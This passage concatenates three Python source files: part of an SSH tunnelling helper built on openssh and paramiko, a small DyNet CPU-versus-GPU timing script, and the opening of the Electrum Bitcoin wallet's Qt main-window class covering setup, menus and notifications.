raise ImportError("pexpect unavailable, use paramiko_tunnel")
ssh="ssh "
if keyfile:
ssh += "-i " + keyfile
if ':' in server:
server, port = server.split(':')
ssh += " -p %s" % port
cmd = "%s -f -L 127.0.0.1:%i:%s:%i %s sleep %i" % (
ssh, lport, remoteip, rport, server, timeout)
tunnel = pexpect.spawn(cmd)
failed = False
while True:
try:
tunnel.expect('[Pp]assword:', timeout=.1)
except pexpect.TIMEOUT:
continue
except pexpect.EOF:
if tunnel.exitstatus:
print (tunnel.exitstatus)
print (tunnel.before)
print (tunnel.after)
raise RuntimeError("tunnel '%s' failed to start"%(cmd))
else:
return tunnel.pid
else:
if failed:
print("Password rejected, try again")
password=None
if password is None:
password = getpass("%s's password: "%(server))
tunnel.sendline(password)
failed = True
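# For example, openssh_tunnel(12345, 5555, 'user@gateway', remoteip='10.0.0.5')
# spawns roughly: ssh -f -L 127.0.0.1:12345:10.0.0.5:5555 user@gateway sleep 60
# i.e. connections to local port 12345 are forwarded to 10.0.0.5:5555 as seen
# from the gateway, and the tunnel stays up for at least `timeout` seconds.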
def _split_server(server):
if '@' in server:
username,server = server.split('@', 1)
else:
username = getuser()
if ':' in server:
server, port = server.split(':')
port = int(port)
else:
port = 22
return username, server, port
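# e.g. _split_server('alice@bastion.example.com:2222') == ('alice', 'bastion.example.com', 2222)
# and  _split_server('bastion.example.com') falls back to the current user and port 22.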
def paramiko_tunnel(lport, rport, server, remoteip='127.0.0.1', keyfile=None, password=None, timeout=60):
"""launch a tunner with paramiko in a subprocess. This should only be used
when shell ssh is unavailable (e.g. Windows).
This creates a tunnel redirecting `localhost:lport` to `remoteip:rport`,
as seen from `server`.
If you are familiar with ssh tunnels, this creates the tunnel:
ssh server -L localhost:lport:remoteip:rport
keyfile and password may be specified, but ssh config is checked for defaults.
Parameters
----------
lport : int
local port for connecting to the tunnel from this machine.
rport : int
port on the remote machine to connect to.
server : str
The ssh server to connect to. The full ssh server string will be parsed.
user@server:port
remoteip : str [Default: 127.0.0.1]
The remote ip, specifying the destination of the tunnel.
Default is localhost, which means that the tunnel would redirect
localhost:lport on this machine to localhost:rport on the *server*.
keyfile : str; path to public key file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str;
Your ssh password to the ssh server. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
timeout : int [default: 60]
The time (in seconds) after which no activity will result in the tunnel
closing. This prevents orphaned tunnels from running forever.
"""
if paramiko is None:
raise ImportError("Paramiko not available")
if password is None:
if not _try_passwordless_paramiko(server, keyfile):
password = getpass("%s's password: "%(server))
p = Process(target=_paramiko_tunnel,
args=(lport, rport, server, remoteip),
kwargs=dict(keyfile=keyfile, password=password))
p.daemon=False
p.start()
atexit.register(_shutdown_process, p)
return p
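# Illustrative use on Windows, equivalent to the openssh_tunnel example above:
#   p = paramiko_tunnel(12345, 5555, 'user@gateway', remoteip='10.0.0.5')
#   ...  # use tcp://127.0.0.1:12345 while the tunnel process is alive
#   p.terminate()  # or rely on the atexit hook registered above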
def _shutdown_process(p):
if p.is_alive():
p.terminate()
def _paramiko_tunnel(lport, rport, server, remoteip, keyfile=None, password=None):
"""Function for actually starting a paramiko tunnel, to be passed
to multiprocessing.Process(target=this), and not called directly.
"""
username, server, port = _split_server(server)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
try:
client.connect(server, port, username=username, key_filename=keyfile,
look_for_keys=True, password=password)
# except paramiko.AuthenticationException:
# if password is None:
# password = getpass("%s@%s's password: "%(username, server))
# client.connect(server, port, username=username, password=password)
# else:
# raise
except Exception as e:
print ('*** Failed to connect to %s:%d: %r' % (server, port, e))
sys.exit(1)
# Don't let SIGINT kill the tunnel subprocess
signal.signal(signal.SIGINT, signal.SIG_IGN)
try:
forward_tunnel(lport, remoteip, rport, client.get_transport())
except KeyboardInterrupt:
print ('SIGINT: Port forwarding stopped cleanly')
sys.exit(0)
except Exception as e:
print ("Port forwarding stopped uncleanly: %s"%e)
sys.exit(255)
if sys.platform == 'win32':
ssh_tunnel = paramiko_tunnel
else:
ssh_tunnel = openssh_tunnel
__all__ = ['tunnel_connection', 'ssh_tunnel', 'openssh_tunnel', 'paramiko_tunnel', 'try_passwordless_ssh']
|
cpu_vs_gpu.py
|
# Usage: python cpu_vs_gpu.py
import time
from multiprocessing import Process
def do_cpu():
import _dynet as C
C.init()
cm = C.Model()
cpW = cm.add_parameters((1000,1000))
s = time.time()
C.renew_cg()
W = C.parameter(cpW)
W = W*W*W*W*W*W*W
z = C.squared_distance(W,W)
z.value()
z.backward()
print("CPU time:",time.time() - s)
def do_gpu():
import _dynet as G
import sys
sys.argv.append('--dynet-devices')
sys.argv.append('GPU:0')
G.init()
gm = G.Model()
gpW = gm.add_parameters((1000,1000))
s = time.time()
G.renew_cg()
W = G.parameter(gpW)
W = W*W*W*W*W*W*W
z = G.squared_distance(W,W)
z.value()
z.backward()
print("GPU time:",time.time() - s)
if __name__ == '__main__':
procs1 = Process(target=do_cpu)
procs1.start()
procs2 = Process(target=do_gpu)
procs2.start()
procs1.join()
procs2.join()
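# Each backend runs in its own process because DyNet selects its device when the
# module is initialized, so keeping the runs separate (presumably) avoids one
# backend's initialization affecting the other's measurement. Note that the GPU
# figure still includes one-off device initialization cost, so this is a rough comparison.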
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum
from electrum import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugin import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI)
from electrum.transaction import Transaction, TxOutput
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.paymentrequest import PR_PAID
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def on_history(self, b):
self.wallet.clear_coin_price_cache()
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.logger.info(f"unexpected network message: {event} {args}")
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
else:
self.logger.info(f"unexpected network_qt signal: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
self.need_update.set()
        # Once the GUI has been initialized, check whether there is anything to announce,
        # since the callback may have fired before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
        # Settings / Preferences are reserved keywords in macOS; use this as a workaround
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
    # Custom wrappers for getOpenFileName and getSaveFileName that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
